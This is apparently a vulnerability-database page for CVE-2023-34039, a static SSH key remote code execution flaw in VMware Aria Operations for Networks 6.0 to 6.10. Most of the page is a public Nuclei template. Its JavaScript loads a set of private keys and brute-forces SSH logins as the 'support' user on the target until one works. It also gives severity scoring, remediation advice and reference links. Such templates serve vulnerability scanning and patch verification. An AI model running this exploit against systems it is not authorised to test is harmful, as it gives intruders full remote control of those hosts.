CVE-2023-34039: VMWare Aria Operations - Remote Code Execution

Date: 2025-08-01 | Affected software: VMWare Aria Operations | PoC: public

Vulnerability description

VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039) Version: All versions from 6.0 to 6.10

PoC code [public]

id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.93246
    epss-percentile: 0.99797
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023
variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # the init field can be used to make any preparations before the actual exploit runs
  # here we read all private keys from the helpers folder and store them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 4a0a004730450220500d7392393d92e23f8235b2a82711e3b45cf4aa10db3b8138c3262c48965fab022100bcff4c867f41e6224ffff2e5748ef95a2f5b670d55ca6094bc8439e9dcd55cbb:922c64590222798bb761d5b6d8e72950
